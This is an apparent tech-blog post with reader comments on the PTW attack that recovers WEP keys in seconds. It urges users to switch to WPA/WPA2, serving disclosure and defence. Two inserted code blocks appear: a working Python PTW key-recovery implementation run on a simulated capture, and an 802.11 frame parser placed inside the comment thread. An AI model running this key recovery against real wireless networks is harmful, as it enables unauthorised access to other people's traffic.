German researchers put final nail in WEP


Summary: A group of German cryptographic researchers (Erik Tews, Andrei Pychkine, and Ralf-Philipp Weinmann) at the cryptography and computer algebra group at the technical university Darmstadt in Germany have come up with a new statistical attack against WEP (Wired Equivalent Privacy) that's faster than anything achieved before.


A group of German cryptographic researchers (Erik Tews, Andrei Pychkine, and Ralf-Philipp Weinmann) at the cryptography and computer algebra group at the technical university Darmstadt in Germany have come up with a new statistical attack against WEP (Wired Equivalent Privacy) that's faster than anything achieved before. Wireless security researcher Jon "Johnny Cache" Ellch was so impressed with the work that he declared, "This is going to be more than an order of magnitude faster than all of the previous statistical attacks." Ellch added that the code weighed in at an "astounding 700 lines of code" and that he couldn't wait to start testing and re-implementing it.

Up until this point, with the KoReK class of attacks being the fastest thing around, I've typically considered WEP 104 (incorrectly known as WEP 128, since the marketing figure counts the 24-bit IV that travels in the clear as key material) to be breakable in just over eight minutes on average on an 802.11g network operating at a peak sustainable throughput of 24 Mbps. Under idle network conditions a passive attack on WEP would be impractical, because the statistical attacks need a large number of captured packets, each encrypted under a different IV. But an attacker can use an ARP replay attack to induce responses from legitimate hosts and generate that data: WEP has no replay protection, so a captured encrypted ARP request can be retransmitted without knowing the key, and every reply comes back encrypted under a fresh IV. Using the packet injection ARP replay attack, WEP 104-bit encryption would be broken in about 22 minutes on average.

But with the new aircrack-ptw (named for Pychkine, Tews and Weinmann) algorithm, which runs about 20 times faster than the previous class of WEP-cracking algorithms based on the work of hacker "KoReK," WEP can fall in an average of 20 seconds on an 802.11g network and an average of 80 seconds on an 802.11b network if the network is very busy. For an idle network that's being attacked with packet injection, WEP can fall in an average of 52 seconds for 802.11g or 3.5 minutes with 802.11b. But we have to assume the worst, and the cracking can sometimes happen even faster than the averages I listed. What this means is that WEP is officially broken beyond repair, even with dynamic key rotation: a key that can be recovered in under a minute of traffic cannot be rotated fast enough to matter.
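An added example, not code from the article or from aircrack-ptw, of what a statistical WEP attack of this class actually computes. It builds a constructed capture of ARP replies (random IVs, one fixed root key), recovers the first keystream bytes from the fixed LLC/SNAP and ARP header that every ARP frame carries, tallies the PTW vote for the key-byte sums, and then verifies the best-ranked candidate keys against the CRC-32 ICV. The key, IVs and packet contents are invented here, and a 40-bit key with 60,000 frames is used so that pure Python finishes in seconds; the same vote extended to all 13 bytes of WEP-104, with more frames and a larger ranked search than this script performs, is what aircrack-ptw runs.

```python
import itertools
import random
import zlib

N = 256       # RC4 permutation size
IV_LEN = 3    # WEP sends a 24-bit IV in the clear in front of each packet
# Every ARP frame starts with the same 8-byte LLC/SNAP header and 8-byte ARP
# header, so its first 16 plaintext bytes (and keystream bytes) are known.
ARP_PREFIX = bytes.fromhex("aaaa030000000806" "0001080006040001")


def rc4_keystream(key, n):
    """First n bytes of RC4 output for key: KSA followed by PRGA."""
    S, j, klen = list(range(N)), 0, len(key)
    for i in range(N):
        j = (j + S[i] + key[i % klen]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(root_key, iv, plaintext):
    """WEP body: (plaintext || CRC-32 ICV) XOR RC4(iv || root_key), IV prepended."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    ks = rc4_keystream(iv + root_key, len(plaintext) + 4)
    return iv + bytes(a ^ b for a, b in zip(plaintext + icv, ks))


def wep_decrypt(root_key, frame):
    """Plaintext if the ICV verifies under root_key, otherwise None."""
    iv, body = frame[:IV_LEN], frame[IV_LEN:]
    pt = bytes(a ^ b for a, b in zip(body, rc4_keystream(iv + root_key, len(body))))
    return pt[:-4] if zlib.crc32(pt[:-4]).to_bytes(4, "little") == pt[-4:] else None


def ptw_votes(frames, key_len):
    """votes[i][v] = frames whose PTW equation says sigma_i == v, where sigma_i =
    Rk[0] + ... + Rk[i] mod 256.  Uses only the cleartext IV and the known keystream."""
    votes = [[0] * N for _ in range(key_len)]
    for frame in frames:
        iv = frame[:IV_LEN]
        X = [frame[IV_LEN + k] ^ ARP_PREFIX[k] for k in range(IV_LEN + key_len)]
        S, j = list(range(N)), 0
        for i in range(IV_LEN):          # first 3 KSA steps depend on the IV alone
            j = (j + S[i] + iv[i]) & 0xFF
            S[i], S[j] = S[j], S[i]
        inv = [0] * N                     # S_3 inverse
        for idx, val in enumerate(S):
            inv[val] = idx
        ssum = 0
        for i in range(key_len):
            ssum += S[IV_LEN + i]
            # sigma_i ~ S_3^-1[(3+i) - X[2+i]] - (j_3 + sum_{l=3..3+i} S_3[l]);
            # true for about 1.24 in 256 frames instead of 1 in 256
            v = (inv[(IV_LEN + i - X[IV_LEN + i - 1]) & 0xFF] - (j + ssum)) & 0xFF
            votes[i][v] += 1
    return votes


def true_sums(root_key):
    out, s = [], 0                        # sigma_i of a known key, to measure the bias
    for b in root_key:
        s = (s + b) & 0xFF
        out.append(s)
    return out


def sums_to_key(sums):
    return bytes((sums[i] - (sums[i - 1] if i else 0)) & 0xFF for i in range(len(sums)))


def ptw_recover(votes, frames, depth=6):
    """Key ranking: combine the `depth` best-voted values of every sigma_i, best total
    score first, and accept the first key whose ICV verifies on a captured frame."""
    ranked = [sorted(range(N), key=lambda v: -row[v])[:depth] for row in votes]
    cands = sorted(itertools.product(*ranked),
                   key=lambda c: -sum(votes[i][v] for i, v in enumerate(c)))
    for c in cands:
        key = sums_to_key(c)
        if wep_decrypt(key, frames[0]) is not None:   # wrong key passes with prob. 2^-32
            return key
    return None                           # true sums fell outside the search


def simulate_capture(root_key, n_frames, seed=7):
    """Constructed stand-in for what ARP replay yields: n_frames ARP replies,
    each under a fresh random IV, all under the same root key."""
    rng = random.Random(seed)
    frames = []
    for _ in range(n_frames):
        iv = bytes(rng.randrange(N) for _ in range(IV_LEN))
        arp_tail = bytes(rng.randrange(N) for _ in range(20))   # sender/target MAC+IP
        frames.append(wep_encrypt(root_key, iv, ARP_PREFIX + arp_tail))
    return frames


if __name__ == "__main__":
    KEY = bytes.fromhex("c0ffee1337")          # constructed 40-bit root key
    frames = simulate_capture(KEY, 60000)
    votes = ptw_votes(frames, len(KEY))
    hits = sum(votes[i][s] for i, s in enumerate(true_sums(KEY)))
    print("vote hit rate x256:", round(256 * hits / (len(KEY) * len(frames)), 2))
    print("recovered:", ptw_recover(votes, frames), "true:", KEY)
```

The printed hit rate comes out around 1.3 rather than the 1.0 a uniform guess would give; that gap, multiplied by tens of thousands of IVs, is the whole attack. The recovery usually succeeds at this frame count and prints None when the true sums fall outside the ranked search, which is exactly why the real tool keeps collecting frames and retrying rather than stopping at a fixed number.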

I had pretty much declared WEP dead more than two years ago, but there was some room left for aggressive dynamic WEP key rotation. Now that WPA and even WPA2 can be automatically deployed within the Windows environment, there really is no excuse to be using WEP anymore. As of this latest round of WEP-cracking with aircrack-ptw, I'm adding WEP to my list of wireless LAN myths as the seventh dumbest way to secure a wireless LAN. It's still at the bottom of the list because WEP at least still takes a little bit of work to crack, whereas it takes ZERO effort to crack MAC filtering, SSID hiding, and DHCP disabling.

Businesses can follow my ultimate enterprise wireless LAN security guide. Home users need to implement WPA-PSK with a random passphrase of at least 10 alphanumeric characters. For those of you who own a Nintendo DS system, you may be tempted to downgrade your security to WEP to accommodate your WPA-incapable Nintendo DS. But you've been warned how dangerous it is to run WEP. When the Sony PSP came out with WEP-only support, I slammed them for it, and it got a lot of attention within the PSP community. A year after I slammed Sony for not putting in real wireless LAN security, it updated the PSP with newer firmware that did support WPA security. The time has come for the Nintendo community to band together and demand a fix from Nintendo. There are also other consumer electronics devices that support WEP only, and you'll need to complain to those vendors as well to get a fix.


Talkback

50 comments
  • Speaking of Sony and wireless technology

    I know a couple of people with PS3s that are using them wirelessly on home LANs.

    Without exception they have had to disable WPA on their Access Points because the PS3 simply refuse to connect with it on.

    Which surprises me a little as my PSP connects to my WPA wireless absolutely fine.

    Perhaps this is an issue you could investigate George? It would be nice if you could get the same level of response as with the PSP.
    nmh
    • Let me check in to that

      I think we have a test PS3. We'll check it for WPA compliance.
      georgeou
      • If it helps

        I know one of the problematic installations is using a Linksys 802.11b wireless access point. It may simply be a compatibility issue, but it does work fine with the other four PCs using the same access point.
        nmh
  • Nintendo made the move on the Wii, don't be so quick to judge George

    The Wii supports WEP, WPA-PSK (TKIP), WPA-PSK (AES), and WPA2-PSK (AES).

    Remember, the DS came out in November 2004 when most people hadn't even heard of WPA outside of corporate circles (not exactly the DS's projected market!). WEP was the protocol du jour back then.
    Scrat
    • WPA was widely available back then

      WPA was widely available back then and there are newer versions of the DS still being sold. They need to PATCH it.
      georgeou
      • DS Lite came out in 2006

        I often get questions from employees asking about wireless security--and BY FAR the most common reason they say they need WEP is for a Nintendo DS.

        OK, I'd give them a little slack for their 2004 release--they certainly weren't the only ones who hadn't adopted WPA (but it WAS well known). The one that really bothers me is the DS Lite--which was released in 2006, and STILL didn't (and still doesn't) support anything beyond WEP.

        I don't dare recommend the unsupported hack, but there is such a thing for the DS, so that it will support WPA. Here's a link:
        http://geekboy.ca/wifi/?cat=2
        MarvinK
        • Thank you for the link

          Thank you for the link and the extra info.
          georgeou
  • Can you please stop the...

    ...absurdity of constantly referring to Jon Ellch as Jon "Johnny Cache" Ellch?

    I mean really, that's pretty ridiculous isn't it?
    pileofmonkeycrap
    • That's the name he goes by.

      That's the name he goes by. I suppose I can start doing Jon Ellch or Johnny Cache. I'll ask him which he prefers.
      georgeou
    • Ha! Thats funny! Ha! Ha!

      In case any readers didn't notice, this poster calls himself 'pileofmonkeycrap'. His real name is probably Jim or Philbert or something like that, but he likes 'pileofmonkeycrap' so I guess he is just joking about there being a problem with referring to Jon Ellch as Jon "Johnny Cache" Ellch.
      Cayble
  • A question about the DS

    What if you had a dedicated WEP router that was used ONLY for using the DS with one or more friends using the same router, and kept the WAN port unplugged? Would that work in the interim, or are DS's hackable? (I don't own a DS simply because of this problem, however I do have a spare router I could use if I knew this would alleviate the problem.) Obviously your capabilities would be limited because you couldn't connect to the internet, but if all you want to do is play with your friends wouldn't this work?
    Michael Kelly
    • Not many people will set up a DMZ for their DS

      http://articles.techrepublic.com.com/5100-1035-6112367.html
      You can follow this guide to set up a guest wireless LAN that's locked down from the rest of the network and still have Internet access. Problem is that it's a few hundred dollars compared to the cheap $40 router/AP.

      You can try and string something together with a router behind a router for your secure network, but that gets kind of sloppy, forcing you to do a double NAT on your secure machines.

      We might be able to build something with Open Source but that's still not easy or cheap compared to a cheap $40 router.
      georgeou
  • Like TiVo series 2 and certain adapters...

    "There are also some other consumer electronics devices that support WEP only, and you'll need to complain to them as well to get a fix."

    C'mon, TiVo, could you just update the drivers, please?
    mrtuba9
    • Ah, I should have called out Tivo by name

      Ah, I should have called out Tivo by name. I'll look in to it.
      georgeou
    • Tivo does support WPA

      but only on their own WiFi adapter product. I'd be willing to bet that most other non-PC products are the same way.
      Michael Kelly
  • Who has time to hack WEP?

    All these so-called "hacks" are pretty outlandish. Usually taking months to complete. OK, so some screw brained idiot does spend months hacking his neighbor. BIG DEAL. It's a crime anyway. Just because you can break a glass window doesn't make it right, does it? This is over-kill on reporting, and, well, just plain STUPID. Where does reality and common-sense meet these days? Not at ZD-NET that's for sure.
    Narg
    • People like you are why we need full disclosure

      Unfortunately, too many people don't take security and confidentiality seriously. People like you are why we need full disclosure, because without it people believe the threat is theoretical.
      georgeou
    • Stupid until you get pwned

      On that fine day you'll see things in a different light, once you get done wiping the egg from your face. People that assume these things will - or could - never happen to them always seem to be among the inevitable victims. Is it any wonder why?
      klumper
    • Have you heard of a court-ordered wire tap?

      At the point of cracking WEP, all one need do is allow TCP forwarding and ARP with a suitable sniffer in promiscuous mode, e.g., ethereal or dsniff or aircrack.

      What I find amazing is how many still set up their wireless routers with no encryption at all!

      OK George, I've got myself set up with WPA-2 PSK and MAC filtered.

      Is that sufficient?
      D T Schmitz
      • WPA2 or even WPA is enough, don't need MAC filtering

        WPA2 or even WPA is enough, don't need MAC filtering. WEP is still much harder to crack than MAC. There's nothing to be cracked for MAC filtering, MAC addresses are sent in the clear in the header of every single Ethernet frame.
        georgeou
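An added example, not part of the comment above or of the article, showing in bytes what the MAC filtering point means: the three addresses of an 802.11 data frame, and for a WEP frame the 24-bit IV and key index sitting in front of the ciphertext, are readable by anyone in range without a key. The frame is constructed inside the script with locally administered dummy MAC addresses; the parser covers the three-address cases and rejects four-address WDS frames.

```python
import struct


def mac(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_wep_data_frame(frame):
    """Cleartext fields an eavesdropper reads from an 802.11 data frame: the
    transmitter (the address a MAC filter whitelists), the BSSID, and, when the
    Protected bit is set, the WEP IV and key index that precede the ciphertext."""
    fc, = struct.unpack_from("<H", frame, 0)
    if (fc >> 2) & 3 != 2:
        raise ValueError("not a data frame")
    to_ds, from_ds = bool(fc & 0x0100), bool(fc & 0x0200)
    protected = bool(fc & 0x4000)
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    # Address roles depend on the DS bits; Addr2 is always the transmitter.
    if to_ds and not from_ds:          # station -> AP
        roles = {"bssid": a1, "source": a2, "destination": a3}
    elif from_ds and not to_ds:        # AP -> station
        roles = {"destination": a1, "bssid": a2, "source": a3}
    elif not to_ds and not from_ds:    # ad hoc / IBSS
        roles = {"destination": a1, "source": a2, "bssid": a3}
    else:
        raise ValueError("4-address WDS frames not handled here")
    info = {"transmitter": mac(a2), "protected": protected}
    info.update({k: mac(v) for k, v in roles.items()})
    if protected:
        body = frame[24:]
        info["iv"] = body[:3].hex()                # 24-bit IV, never encrypted
        info["key_index"] = body[3] >> 6           # top two bits of the 4th byte
        info["ciphertext_len"] = len(body) - 4 - 4 # minus IV/key id and ICV
    return info


def build_wep_data_frame(src, bssid, dst, iv, key_index, body):
    """Constructed station->AP WEP data frame (frame control 08 41), used only
    to make sample input; `body` stands in for ciphertext || ICV."""
    fc = (2 << 2) | 0x0100 | 0x4000                # data, To DS, Protected
    hdr = struct.pack("<HH", fc, 0) + bssid + src + dst + struct.pack("<H", 0)
    return hdr + iv + bytes([key_index << 6]) + body


if __name__ == "__main__":
    # dummy locally administered addresses, not real devices
    STA, AP, DST = (bytes.fromhex(f"02000000000{n}") for n in (1, 2, 3))
    frame = build_wep_data_frame(STA, AP, DST, bytes.fromhex("a1b2c3"), 1, bytes(40))
    print(parse_wep_data_frame(frame))
```

Cloning the transmitter address this returns is the entire "attack" on MAC filtering, which is why the comment above ranks it below WEP: there is no secret to recover.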